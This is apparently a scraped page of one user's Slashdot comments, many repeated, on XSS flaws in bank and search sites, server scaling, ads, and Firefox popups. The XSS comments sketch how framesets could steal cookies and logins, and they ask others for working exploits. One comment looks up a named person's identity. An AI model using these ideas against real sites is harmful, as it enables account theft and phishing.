Well, with XSS, you don't have to "break into" anything to discover the vulnerability. All you do is throw the webservers a few strings and see what they send back.
I've found dozens of XSS problems on sites, and have made news for one on Citibank. I've only received a few threatening legal letters from companies.
Uhm, yeah, that is still a problem though. Have you allowed Google.com? have you allowed other sites that you trust, but still may have XSS problems? When the script is executed, it's done so under the google.com domain. This is the main problem w/ xss.
What needs to happen is sites need to use LESS javascript, and shoud degrade gracefully when js is disabled. Unfortunately, with AJAX, it's more common than ever.
It's easy to force a user to go to a url. If you go to a website, they can include a frame and load the the error.
They can even go to multiple problems at the same time. If this problem were more prevelant, a hacker could craft a page that steals ALL your online logins/cookies/etc from any site that had the problem. They would just need to craft a page with multiple framesets that load up all the vunlerable pages.
XSS is also making news because it's being used by phishers to forge stuff from the target domain. All the anti phishing stuff relies on which domain a link is going to.. but in a sense, XSS allows phishers to put their own page (ie. fake login) on the target domain! It is very much a problem for any site that deals with personal information, or has trusted content.
Does anyone have the real post that hasn't been mangled by the mailing list?
What are these characters that they used?
Does anyone have a working exploit of this type (encoded xss) on another site?
They've had others in the past, but were quick to fix them. They have even sent t-shirts as thanks for the help.
Other sites are not so friendly or fast. This site shows active security holes in various sites that have gone unresolved. (CSS, insecure logins, etc)
I agree with much of this post. Once split up, you can also easily see where you need to grow. For one of my growing sites that was very image and database dependant, I used 1 primary machine, 2 database machines and 6 image/static content machines. The image servers were all just mirrors of the main site, and put into round robin DNS, which provides pretty good, but not perfect load balancing. I didn't have a logging machine, but I did have another machine for backups and other things like email.
People often try to set up more complex ways of handling things, but often times it's an overreaction.
They have been using graphical image ads for a long time for their own products.
I currently see this at the bottom of my search results.
http://www.google.com/images/firefox_toolbar.gif
They also have been using image ads in their adsense network for ages. They also put graphical themes in the text ads for the holidays: Just search for Christmas
I don't see why anyone can be upset with this minor change.
Well, it was sorta a joke... But really, isn't it only time till cells & pdas catch up and can display most pages normally? I think that changing the site for small layouts is a waste for most sites at this time. Of course, a well engineered site would be flexible enough to support different designs, but extensive tranformations necessary for cell phones is just too costly for most sites.
Pretty much all the websites work about the same on my mobile wireless laptop. Why would people need to modify how they make the sites for them to work right?
Were you limiting you adwords campaign to just Google search, or were you including content websites?
It's easy to limit the adwords campaign so that there is no modivation for click fraud.
You could add a local caching proxy server and/or set browsers to cache longer to reduce bandwidth. Have you done an analysis on how much of the traffic is people just pulling up the same pages?
well, there are a few references to you on slashdot.
Searching zabasearch for "Alexander Case" finds only a few people, but none of them in OR. Are you using and assumed name or location online?
Why does everyone get this wrong? RIAA is going after people SHARING music online, not the downloaders directly. How could slashdot get this wrong? How come everyone here has gotten it wrong? RIAA can only track those people sharing music, or downloading directly from them. They are going after the people sharing music.
I've even tried completely wiping out my config and seeing stuff w/ default settings. Uhg! I still get pops, but I also get those annoying plugin install notices (which, I've turned off)
Yes, I go to those sites all the time. The point is that the most untrusted of sites have beached the boundaries that are suppose to be set up in the browser. I don't like the fact that Firefox can't control javascript. I don't like the FACT that IE is better than FireFox at blocking popups.
If you can't trust FireFox to block pop ups, can you trust it for banking and other critical stuff?
I can't stand it, since upgrading to 1.5, I've gotten MORE popups. Even with 1.1, I got more popups in Firefox than I do in IE... and no, it's not Flash based popups, because I can't even get that installed. 2 big thumbs down for Firefox 1.5. How is it that the coders of firefox can't control the freaking Open Window fuction? Just disabled it!!! I don't want more windows!
Slashdot Mirror
I've found dozens of XSS problems on sites, and have made news for one on Citibank. I've only received a few threatening legal letters from companies.
What needs to happen is sites need to use LESS javascript, and shoud degrade gracefully when js is disabled. Unfortunately, with AJAX, it's more common than ever.
They can even go to multiple problems at the same time. If this problem were more prevelant, a hacker could craft a page that steals ALL your online logins/cookies/etc from any site that had the problem. They would just need to craft a page with multiple framesets that load up all the vunlerable pages.
XSS is also making news because it's being used by phishers to forge stuff from the target domain. All the anti phishing stuff relies on which domain a link is going to.. but in a sense, XSS allows phishers to put their own page (ie. fake login) on the target domain! It is very much a problem for any site that deals with personal information, or has trusted content.
Does anyone have the real post that hasn't been mangled by the mailing list? What are these characters that they used? Does anyone have a working exploit of this type (encoded xss) on another site?
do you know of any xss bugs in yahoo?
They've had others in the past, but were quick to fix them. They have even sent t-shirts as thanks for the help. Other sites are not so friendly or fast. This site shows active security holes in various sites that have gone unresolved. (CSS, insecure logins, etc)
I agree with much of this post. Once split up, you can also easily see where you need to grow. For one of my growing sites that was very image and database dependant, I used 1 primary machine, 2 database machines and 6 image/static content machines. The image servers were all just mirrors of the main site, and put into round robin DNS, which provides pretty good, but not perfect load balancing. I didn't have a logging machine, but I did have another machine for backups and other things like email. People often try to set up more complex ways of handling things, but often times it's an overreaction.
They have been using graphical image ads for a long time for their own products. I currently see this at the bottom of my search results. http://www.google.com/images/firefox_toolbar.gif They also have been using image ads in their adsense network for ages. They also put graphical themes in the text ads for the holidays: Just search for Christmas I don't see why anyone can be upset with this minor change.
Well, it was sorta a joke... But really, isn't it only time till cells & pdas catch up and can display most pages normally? I think that changing the site for small layouts is a waste for most sites at this time. Of course, a well engineered site would be flexible enough to support different designs, but extensive tranformations necessary for cell phones is just too costly for most sites.
Pretty much all the websites work about the same on my mobile wireless laptop. Why would people need to modify how they make the sites for them to work right?
Were you limiting you adwords campaign to just Google search, or were you including content websites? It's easy to limit the adwords campaign so that there is no modivation for click fraud.
Why doesn't some company start up and open e-voting machine business?
The amazon search engine a9.com pays pi/2% off on most amazon purchases. It's a nice plus, but hasn't made me switch from google.
You could add a local caching proxy server and/or set browsers to cache longer to reduce bandwidth. Have you done an analysis on how much of the traffic is people just pulling up the same pages?
$0.99 * # of downloads = total value (obviously though, only a % goes to the music company, but still)
They automatically make more money on more popular songs already. It doesn't need to be exponential growth!!!
well, there are a few references to you on slashdot. Searching zabasearch for "Alexander Case" finds only a few people, but none of them in OR. Are you using and assumed name or location online?
Why does everyone get this wrong? RIAA is going after people SHARING music online, not the downloaders directly. How could slashdot get this wrong? How come everyone here has gotten it wrong? RIAA can only track those people sharing music, or downloading directly from them. They are going after the people sharing music.
I've even tried completely wiping out my config and seeing stuff w/ default settings. Uhg! I still get pops, but I also get those annoying plugin install notices (which, I've turned off)
So, fresh install, fresh configs.. pops galore.
Hmm. interesting, considering I just installed it today. Are you on linux?
If you can't trust FireFox to block pop ups, can you trust it for banking and other critical stuff?
example site: http://www.dollchick.com/
b. I run ads on my own sites from there, so I really can't ban the site.
c. I see ads coming from fastclick, casale, tribal fusion. I think they've all figured it out.
d. It seems like a javascript security hole to me. Why don't you tell the firefox engineers about the problem.
I do have the popup blocker enabled.
I'm on linux, it is NOT an automated process. They don't even have a firefox installer.
I do have the popup blocker enabled.
b. If that did work, why wouldn't that be the setting that is set by the "block popup windows" option in user settings?
I can't stand it, since upgrading to 1.5, I've gotten MORE popups. Even with 1.1, I got more popups in Firefox than I do in IE... and no, it's not Flash based popups, because I can't even get that installed. 2 big thumbs down for Firefox 1.5. How is it that the coders of firefox can't control the freaking Open Window fuction? Just disabled it!!! I don't want more windows!